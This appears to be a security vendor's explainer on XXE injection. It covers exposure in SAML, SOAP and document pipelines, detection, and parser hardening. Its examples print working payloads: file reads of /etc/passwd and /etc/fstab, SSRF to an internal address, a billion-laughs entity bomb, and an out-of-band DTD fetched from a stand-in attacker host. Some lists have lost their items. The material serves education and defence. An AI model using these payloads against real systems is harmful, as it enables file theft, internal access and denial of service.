XML external entity (XXE) vulnerabilities still show up in enterprise environments because XML is embedded in high-value workflows such as SAML-based single sign-on (SSO), SOAP integrations, and services that parse XML-backed document formats. When enterprise XML parsers run with permissive defaults or inherited configurations that allow an external entity reference to be resolved, attackers can abuse that behavior to read local files or trigger server-side requests to internal systems.
An XXE vulnerability occurs when an application processes untrusted XML input with an XML processor that allows external entity resolution, often via external DTD processing.Â
In the past, XXE was a prominent enough risk to get its own OWASP Top 10 category in 2017. In later OWASP Top 10 editions, XXE has been grouped under the broader category of security misconfigurations. This is a reminder that many XXE weaknesses are ultimately caused by unsafe parser configuration rather than bad XML.
An XML external entity (XXE) vulnerability, also called XML external entity injection or XXE injection, occurs when a server-side XML parser processes untrusted XML and is allowed to resolve external entities. External entities in XML can reference local files or remote URLs, so a vulnerable parser may fetch sensitive data from the filesystem or make network requests on an attacker’s behalf. This can enable impacts such as file disclosure, credential and configuration leakage, and server-side request forgery (SSRF) to internal services, including SSRF attacks against internal HTTP endpoints.Â
While less common in modern tech stacks, XXE risks may persist in older enterprise systems where XML is still used in SAML authentication flows, legacy SOAP APIs, and document processing pipelines, especially when parser settings are shared across multiple applications and teams.
When XXE resolution is exploitable, possible outcomes usually map to two main attacker goals: steal data and reach internal services. Depending on the application behavior and parser configuration, attackers may be able to:
/etc/passwd, application configuration files, keys, and environment-specific secretsXXE rarely appears in brand-new, JSON-only APIs. It can, however, show up in legacy systems where XML is still a core data exchange format and where parsing is handled by shared libraries or middleware with permissive defaults.
SAML uses XML for its assertions and signatures. Implementations often parse SAML assertions and metadata using shared XML libraries, and XXE becomes possible when those underlying parsers are not hardened. This is one reason XXE can surface in authentication and identity integration paths – not because SAML somehow “requires” unsafe parsing, but because parser settings are easy to inherit and hard to standardize across identity services, gateways, and downstream applications.
SOAP is still common in enterprise environments, B2B integrations, and internal service ecosystems that have been running for years. Even if a company’s primary APIs are REST/JSON, a legacy part of the stack may still accept XML payloads for interoperability and backend access, sometimes through middleware that centralizes parsing behavior. Real-world exposure is often tracked through CVE advisories that apply to specific SOAP stacks, libraries, or gateways.
Many systems accept uploads that end up being parsed as XML, even if the user never uploads a file with an explicit .xml extension. Common examples of XML-based formats include:
XML-reliant pipelines are particularly risky because they are easy to overlook during API reviews and they often run with broad filesystem and network access. In practice, some of the most important attack vectors are indirect, where an attacker uploads a document and a backend service parses the XML embedded in it.
Enterprise service buses (ESBs), integration platforms, gateways, and transformation services frequently ingest and transform XML between systems. If these shared components parse untrusted XML from partners, users, or downstream systems, one permissive parser configuration can create a broad blast radius.
For XML external entity injection to be possible, two conditions typically need to be true:
The key point is that the XML parser performs the dangerous action. If an entity references a local file or a URL, the parser may read that file or fetch that URL from the server’s local environment. This is why XXE often leads to file disclosure and SSRF – because the request originates from the server, not the attacker’s machine. It’s also why XXE frequently persists as a configuration issue: the same parser settings may be reused in multiple applications and services.
XML parsers can use a document type definition (DTD) to define entities, alongside other approaches such as XML schema definitions (XSD) that constrain document structure. An entity is a placeholder that the parser expands during parsing, and external entities are ones whose values are retrieved from an external source, such as a local file or a remote URL. If external entities are enabled even for untrusted input, attackers can coerce the parser into retrieving sensitive content or reaching internal network resources.
In practice, the risk often maps directly to specific parser implementations and their configuration options. Common examples include SimpleXML for PHP, DocumentBuilder for Java, ElementTree for Python, XmlReader for .NET, and DOMParser for JavaScript. Defaults and safe configuration patterns vary by library and runtime, so teams should verify parser behavior rather than assume it is secure by default. This is also where vendor ecosystems matter – for example, Apache and Microsoft stacks may expose different parser defaults and hardening settings depending on the library and runtime.
XXE is commonly described in three forms:
This article focuses on in-band examples, but the same root causes apply to OOB and blind variants.
XXE attacks typically inject a malicious DTD that defines an external entity and then reference that entity in the document so the parser expands it. Payload syntax varies by parser and library settings, but the underlying idea is the same.
A classic XXE payload defines an entity that reads a local file and then returns its contents in the application response. The attacker might send an HTTP request like:
POST http://example.com/xml HTTP/1.1
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<foo>&xxe;</foo>If the attack succeeds and the parser resolves the &xxe; external entity defined as the local password file, the HTTP response might include the contents of that file:
HTTP/1.0 200 OK
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
...If the application reflects parsed XML content back to the client, this is the simplest path to data theft.
If the parser is allowed to resolve external entities over HTTP(S), an attacker can use XXE to make the server request internal resources. This is a form of SSRF, but delivered through the XML parser. This time, the external entity references an internal HTTP resource:
POST http://example.com/xml HTTP/1.1
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "http://192.168.0.1/secret.txt">
]>
<foo>&xxe;</foo>If successful, the attack could return the contents of the secret.txt file from the local network.
Because the server makes the request from inside the network, XXE-based SSRF can bypass protections such as IP allowlists, perimeter firewalls, and segmentation that assume external users cannot reach internal services. In some environments, the same mechanism can also be used for internal service discovery and limited port probing, depending on how connection failures are signaled.
Entities can also be defined in terms of other entities. Attackers can use this feature to force exponential entity expansion that consumes CPU and memory to cause a denial of service. A well-known form is the “billion laughs” pattern, named after the use of lol as the string in early examples.
Even this short example would cause the “World” in a “Hello World” string to be expanded 40 times:
POST http://example.com/xml HTTP/1.1
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY bar "World ">
<!ENTITY t1 "&bar;&bar;">
<!ENTITY t2 "&t1;&t1;&t1;&t1;">
<!ENTITY t3 "&t2;&t2;&t2;&t2;&t2;">
]>
<foo>Hello &t3;</foo>Larger payloads can cause far larger expansions, which is why this technique is also called an XML bomb. The result can be parsing failures, service degradation, or complete unavailability, depending on resource limits and safeguards.
Many real systems won’t reflect the parsed entity contents directly, while others may block specific patterns but leave the underlying unsafe behaviors available. The following concepts help explain why XXE can often still be exploited in practice.
In many in-band scenarios, the server response is generated from parsed XML. If the exfiltrated content contains any characters that are not valid in the response’s XML context, parsing may fail or the data may be mangled. This is a practical limitation of the way XML parsers interpret syntax, not any guarantee of safety.
For example, attempting to include file content in the XML document structure when the data isn’t valid markup can trigger parser errors if the parser treats the included bytes as markup rather than plain text. This is where CDATA sections are useful.
CDATA sections allow XML documents to include characters that would otherwise be treated as markup. XML also supports parameter entities, which are used within DTDs. By combining parameter entities with CDATA, attackers can sometimes wrap extracted content so it can be safely returned in an XML response.
A common pattern is to reference an attacker-hosted DTD that defines entities to read a local file and wrap it in CDATA, then define a general entity that the document can safely include. Conceptually, a payload may look like this:
POST http://example.com/xml HTTP/1.1
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE data [
<!ENTITY % dtd SYSTEM "http://bad.example.com/evil.dtd">
%dtd;
%all;
]>
<data>&fileContents;</data>The attacker-hosted evil.dtd definition file that extracts and wraps file contents might look something like:
<!ENTITY % file SYSTEM "file:///etc/fstab">
<!ENTITY % start "<![CDATA[">
<!ENTITY % end "]]>">
<!ENTITY % all "<!ENTITY fileContents '%start;%file;%end;'>">If the parser is allowed to fetch external DTDs and resolve external entities, it will load the remote DTD, read the local mount points file via %file;, wrap it in CDATA using %start; and %end;, and expose the result through &fileContents;. This is one way XXE can remain exploitable even when simple in-band payloads fail due to XML parsing constraints.
Some XML processing pipelines support additional inclusion mechanisms such as XInclude. These are not the same as DTD-based external entities, but they can create similar risk if untrusted XML can trigger server-side inclusion or fetching behavior. The key control remains the same: do not allow untrusted XML to drive server-side retrieval of external resources.
In some PHP environments, protocol wrappers can provide additional file access behaviors. For example, the php://filter wrapper can base64-encode file contents. Base64 output is XML-safe, which can help with extracting data that would otherwise break XML parsing, including binary content.
Here’s an example request that fetches the local mount points file via the PHP filter:
POST http://example.com/xml.php HTTP/1.1
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY bar SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/fstab">
]>
<foo>&bar;</foo>Any such XXE capability is heavily environment-dependent and should not be treated as universal, but this example does illustrate why “we blocked file reads” is not always the end of the story if external entities remain enabled.
The right detection method depends on whether you are trying to validate a known exposure or find unknown instances in your own code and services.
If you rely on third-party platforms, middleware, or libraries that parse XML, you can sometimes identify risk through versioning and dependency insight. Software composition analysis (SCA) can help uncover vulnerable parser libraries or XML-processing components. In some enterprise environments, XML parsing may be implemented inside products, gateways, or middleware – in those cases, version identification plus vendor advisories, CVE tracking, and, where appropriate, network scanning can be a practical first-pass for known issues.
This approach helps you understand potential exposure, but it does not prove exploitability in your environment.
To confirm an XXE issue in an application you run or build, you typically need evidence that the parser resolved an external entity. That evidence may be provided by:
Manual testing can be effective for complex, context-dependent flows (for example, SAML and document processing pipelines). Automated dynamic testing (DAST) can help scale discovery and verification across large application and API estates, especially when the goal is to prove which issues are exploitable and where they exist in running systems.
To see how dynamic testing on the Invicti Platform can help you find, fix, and prevent XXE injection vulnerabilities, read more about the available XXE security checks and get a demo to see them in action in your application environment.
Preventing XXE is primarily about ensuring safe parser behavior. Input filtering is a weak control for XXE because many applications legitimately accept complete XML documents, and any ad-hoc sanitization tends to be brittle and easy to bypass.
Ensure your XML parser does not resolve external entities when processing untrusted input. In practice, this usually means disabling:
Use parser configurations that explicitly disallow external entity resolution and external DTD processing. Do not rely on default settings, especially when upgrading libraries or switching XML processing implementations across services. In many environments, the practical action to take is to disable DTDs and block any server-side resolution of external resources.
If DTDs are required for legitimate functionality, allow only local static DTDs and block all external fetches.
Keep XML libraries and XML processing components up to date, including in middleware and document conversion services. Note that in enterprise systems, XML parsing often happens in shared components that may not be owned by the application team.
Incorporate XML-backed file formats and identity integration flows into your threat model and test scope, for example:
Refer to the OWASP XML External Entity Prevention Cheat Sheet for language- and parser-specific hardening steps.
Yes. Even when modern application development favors JSON, XML remains common in enterprise identity workflows (SAML), legacy integrations (SOAP), and document processing. XXE continues to appear whenever XML parsers are deployed with permissive configurations or when teams overlook indirect XML parsing paths such as file conversion services and middleware transformations.
Yes. If the parser resolves external entities via URLs, it can be tricked into making HTTP requests from the server to internal or restricted resources. Because the request originates inside the environment, it can reach services that are not exposed externally and can bypass network controls that assume the attacker is outside the perimeter.
Reliable detection usually requires proof that the target resolved an external entity. In an in-band case, that may be file content returned in the response. In OOB and blind cases, detection may rely on a controlled callback (DNS or HTTP) or other observable signals that indicate the parser attempted to fetch external resources. Because many enterprise environments restrict outbound traffic, XXE testing may also require controlled egress monitoring in a safe test environment to avoid false negatives.
